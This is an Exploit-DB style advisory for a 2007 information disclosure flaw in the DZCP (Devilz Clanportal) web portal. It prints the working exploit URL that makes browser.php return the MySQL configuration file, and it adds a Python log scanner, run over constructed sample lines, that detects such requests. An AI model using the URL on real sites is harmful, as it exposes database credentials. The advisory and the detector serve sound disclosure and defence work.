Vendor: Devilz Clanportal
By: Kiba
CVSS: 5.5 (MEDIUM)
Type: Information Disclosure
CWE: 200
Product Name: Devilz Clanportal
Affected Version From: 1
Affected Version To: 1.4.2005
Patch Exists: YES
Related CWE:
CPE: a:dzcp_project:devilz_clanportal:1.4.5
Metasploit:
Other Scripts:
Platforms Tested:
2007

DZCP (Devilz Clanportal) <= 1.4.5 Mysql Data viewable

The vulnerability allows an attacker to view sensitive MySQL data by accessing the 'browser.php' file in the 'inc/filebrowser' directory. By specifying the 'file' parameter as 'inc/mysql.php', the attacker can retrieve the contents of the MySQL configuration file.

Mitigation:

Install the security fix provided by the vendor.
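
Detection example (added here, not part of the original advisory or of DZCP): a Python scan of web server access logs for requests to 'inc/filebrowser/browser.php' whose 'file' parameter resolves to 'inc/mysql.php'. The log lines are constructed samples in Apache combined format, and the function name and output fields are assumptions.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [21/Feb/2007:10:00:01 +0000] "GET /dzcp/inc/filebrowser/browser.php?file=inc/mysql.php HTTP/1.1" 200 412 "-" "Mozilla/5.0"
192.0.2.11 - - [21/Feb/2007:10:00:05 +0000] "GET /dzcp/inc/filebrowser/browser.php?file=inc%2Fmysql.php HTTP/1.1" 200 412 "-" "curl/7.16"
192.0.2.12 - - [21/Feb/2007:10:01:00 +0000] "GET /dzcp/inc/filebrowser/browser.php?file=inc/./MySQL.php HTTP/1.1" 404 0 "-" "-"
192.0.2.13 - - [21/Feb/2007:10:02:00 +0000] "GET /dzcp/index.php?file=inc/mysql.php HTTP/1.1" 200 900 "-" "-"
192.0.2.14 - - [21/Feb/2007:10:03:00 +0000] "GET /dzcp/inc/filebrowser/browser.php?file=upload/logo.png HTTP/1.1" 200 5120 "-" "-"
"""

# Values taken from the advisory text.
SCRIPT_SUFFIX = "/inc/filebrowser/browser.php"
SENSITIVE_FILE = "inc/mysql.php"

# client, timestamp, method, request target, status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')


def find_config_reads(log_text):
    """Return one record per request that asked browser.php for inc/mysql.php."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        ip, ts, _method, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith(SCRIPT_SUFFIX):
            continue
        # parse_qs percent-decodes values; normpath collapses "./" and "//".
        for value in parse_qs(url.query).get("file", []):
            norm = posixpath.normpath(value.replace("\\", "/")).lower()
            if norm == SENSITIVE_FILE or norm.endswith("/" + SENSITIVE_FILE):
                # served=True means the server answered 200, so the
                # configuration file should be treated as disclosed.
                hits.append({"ip": ip, "time": ts, "file": value,
                             "served": status == "200"})
    return hits


if __name__ == "__main__":
    for hit in find_config_reads(SAMPLE_LOG):
        print(hit)
```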

Exploit-DB raw data:

# DZCP (Devilz Clanportal) <= 1.4.5 Mysql Data viewable
# Found by: Kiba
# Solution: Install security Fix!
# Exploit:

http://[SITE]/[PATH]/inc/filebrowser/browser.php?file=inc/mysql.php

Example: http://www.example.com/dzcp/inc/filebrowser/browser.php?file=inc/mysql.php

# milw0rm.com [2007-02-21]